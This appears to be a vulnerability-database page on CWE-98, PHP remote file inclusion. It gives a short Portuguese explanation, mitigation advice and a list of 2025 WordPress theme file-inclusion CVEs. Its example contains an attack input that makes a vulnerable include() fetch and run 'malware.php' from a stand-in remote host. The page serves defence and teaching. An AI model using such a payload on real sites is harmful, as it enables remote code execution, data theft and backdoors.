Weaknesses of type CWE-98

1,308 results

Inclusão remota de arquivo

Ocorre quando a aplicação inclui dinamicamente um arquivo (via funções como `include()`, `require()` em PHP) sem validar corretamente a entrada do usuário. Um atacante fornece uma URL remota maliciosa e consegue executar código arbitrário no servidor, comprometendo completamente a aplicação.

Example

Uma página PHP recebe um parâmetro `page` e faz `include($_GET['page'])`. Um atacante passa `page=http://seuservidor.com/malware.php` e consegue executar o arquivo malicioso no contexto do servidor web, roubando dados ou instalando backdoors.

How to mitigate

Valide rigorosamente entrada de usuário: use lista branca de arquivos permitidos, não permita URLs remotas, desabilite as directives `allow_url_include` e `allow_url_fopen` no PHP, e sempre sanitize caminhos de arquivo.

CVE-2025-58708HIGHWordPress 777 theme <= 1.3 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60050HIGHWordPress Panda theme <= 1.21 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-58706HIGHWordPress Woo Hoo theme <= 1.25 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-64223HIGHWordPress PenNews theme < 6.7.3 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60061HIGHWordPress Kicker theme <= 2.2.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60051HIGHWordPress Rare Radio theme <= 1.0.15.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-58889HIGHWordPress Towny theme <= 1.16 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60060HIGHWordPress Pubzinne theme <= 1.0.12 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-62010HIGHWordPress Famita theme <= 1.54 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60056HIGHWordPress Winger theme <= 1.0.16 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-49941HIGHWordPress GlamChic theme <= 1.0.11 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-53448HIGHWordPress Rally theme <= 1.1 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-58945HIGHWordPress EcoGrow theme <= 1.7 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-53438HIGHWordPress FitLine theme <= 1.6 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-58941HIGHWordPress Fabric theme <= 1.5.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-58899HIGHWordPress Frame theme <= 2.4.0 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60066HIGHWordPress Katelyn theme <= 1.0.10 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-60043HIGHWordPress Wanderic theme <= 1.0.10 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-53445HIGHWordPress Catwalk theme <= 1.4 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2025-58894HIGHWordPress Good Mood theme <= 1.16 - Local File Inclusion vulnerabilityEPSS 0.5%